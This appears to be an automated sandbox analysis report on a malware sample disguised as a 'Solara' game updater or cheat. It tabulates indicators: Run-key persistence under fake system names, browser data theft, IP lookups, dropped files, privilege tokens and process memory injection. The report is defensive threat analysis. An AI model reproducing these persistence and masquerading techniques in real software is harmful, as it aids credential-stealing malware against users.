N/A N/A C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A

Reads user/profile data of web browsers

spyware stealer

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svhost = "C:\\Users\\Admin\\AppData\\Roaming\\svhost.exe" C:\Users\Admin\AppData\Local\Temp\XClient.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RuntimeBroker = "\"C:\\hostNet\\RuntimeBroker.exe\"" C:\hostNet\bridgeblockportComBroker.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\wscript = "\"C:\\Users\\Default User\\wscript.exe\"" C:\hostNet\bridgeblockportComBroker.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\wscript = "\"C:\\Recovery\\WindowsRE\\wscript.exe\"" C:\hostNet\bridgeblockportComBroker.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\fontdrvhost = "\"C:\\Users\\All Users\\Templates\\fontdrvhost.exe\"" C:\hostNet\bridgeblockportComBroker.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\bridgeblockportComBroker = "\"C:\\hostNet\\bridgeblockportComBroker.exe\"" C:\hostNet\bridgeblockportComBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\wscript = "\"C:\\Users\\Default User\\wscript.exe\"" C:\hostNet\bridgeblockportComBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\fontdrvhost = "\"C:\\Users\\All Users\\Templates\\fontdrvhost.exe\"" C:\hostNet\bridgeblockportComBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Solara_Updater = "\"C:\\Program Files (x86)\\Microsoft\\Solara_Updater.exe\"" C:\hostNet\bridgeblockportComBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\bridgeblockportComBroker = "\"C:\\hostNet\\bridgeblockportComBroker.exe\"" C:\hostNet\bridgeblockportComBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RuntimeBroker = "\"C:\\hostNet\\RuntimeBroker.exe\"" C:\hostNet\bridgeblockportComBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\wscript = "\"C:\\Recovery\\WindowsRE\\wscript.exe\"" C:\hostNet\bridgeblockportComBroker.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Solara_Updater = "\"C:\\Program Files (x86)\\Microsoft\\Solara_Updater.exe\"" C:\hostNet\bridgeblockportComBroker.exe N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A
N/A ip-api.com N/A N/A
N/A ip-api.com N/A N/A
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A
N/A ip-api.com N/A N/A
N/A ip-api.com N/A N/A
N/A ip-api.com N/A N/A
N/A ip-api.com N/A N/A
N/A ip-api.com N/A N/A
N/A ip-api.com N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File created \??\c:\Windows\System32\CSC94C34EF13D4D4F8881CC8A1FBB80DA17.TMP C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe N/A
File created \??\c:\Windows\System32\t4pfwd.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files (x86)\Microsoft\5b8d2ee93f0f21 C:\hostNet\bridgeblockportComBroker.exe N/A
File created C:\Program Files (x86)\Microsoft\Solara_Updater.exe C:\hostNet\bridgeblockportComBroker.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft\Solara_Updater.exe C:\hostNet\bridgeblockportComBroker.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\diagnostics\WmiPrvSE.exe C:\hostNet\bridgeblockportComBroker.exe N/A

Enumerates physical storage devices

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings C:\hostNet\bridgeblockportComBroker.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\sol.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\sol.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\RustCheat.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RustCheat.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RustCheat.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RustCheat.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Loader.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\XClient.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RustCheat.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Loader.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\XClient.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4792 wrote to memory of 4796 N/A C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe C:\Users\Admin\AppData\Local\Temp\Loader.exe
PID 4792 wrote to memory of 4796 N/A C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe C:\Users\Admin\AppData\Local\Temp\Loader.exe
PID 4792 wrote to memory of 2688 N/A C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe C:\Users\Admin\AppData\Local\Temp\sol.exe
PID 4792 wrote to memory of 2688 N/A C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe C:\Users\Admin\AppData\Local\Temp\sol.exe
PID 4792 wrote to memory of 2688 N/A C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe C:\Users\Admin\AppData\Local\Temp\sol.exe
PID 4792 wrote to memory of 808 N/A C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
PID 4792 wrote to memory of 808 N/A C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
PID 2688 wrote to memory of 3584 N/A C:\Users\Admin\AppData\Local\Temp\sol.exe C:\Windows\SysWOW64\WScript.exe
PID 2688 wrote to memory of 3584 N/A C:\Users\Admin\AppData\Local\Temp\sol.exe C:\Windows\SysWOW64\WScript.exe
PID 2688 wrote to memory of 3584 N/A C:\Users\Admin\AppData\Local\Temp\sol.exe C:\Windows\SysWOW64\WScript.exe
PID 808 wrote to memory of 752 N/A C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe C:\Users\Admin\AppData\Local\Temp\Loader.exe
PID 808 wrote to memory of 752 N/A C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe C:\Users\Admin\AppData\Local\Temp\Loader.exe
PID 808 wrote to memory of 768 N/A C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe C:\Users\Admin\AppData\Local\Temp\sol.exe
PID 808 wrote to memory of 768 N/A C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe C:\Users\Admin\AppData\Local\Temp\sol.exe
PID 808 wrote to memory of 768 N/A C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe C:\Users\Admin\AppData\Local\Temp\sol.exe
PID 808 wrote to memory of 2496 N/A C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
PID 808 wrote to memory of 2496 N/A C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
PID 4796 wrote to memory of 1336 N/A C:\Users\Admin\AppData\Local\Temp\Loader.exe C:\Users\Admin\AppData\Local\Temp\XClient.exe
PID 4796 wrote to memory of 1336 N/A C:\Users\Admin\AppData\Local\Temp\Loader.exe C:\Users\Admin\AppData\Local\Temp\XClient.exe
PID 4796 wrote to memory of 2704 N/A C:\Users\Admin\AppData\Local\Temp\Loader.exe C:\Users\Admin\AppData\Local\Temp\RustCheat.exe
PID 4796 wrote to memory of 2704 N/A C:\Users\Admin\AppData\Local\Temp\Loader.exe C:\Users\Admin\AppData\Local\Temp\RustCheat.exe
PID 768 wrote to memory of 4220 N/A C:\Users\Admin\AppData\Local\Temp\sol.exe C:\Windows\SysWOW64\WScript.exe
PID 768 wrote to memory of 4220 N/A C:\Users\Admin\AppData\Local\Temp\sol.exe C:\Windows\SysWOW64\WScript.exe
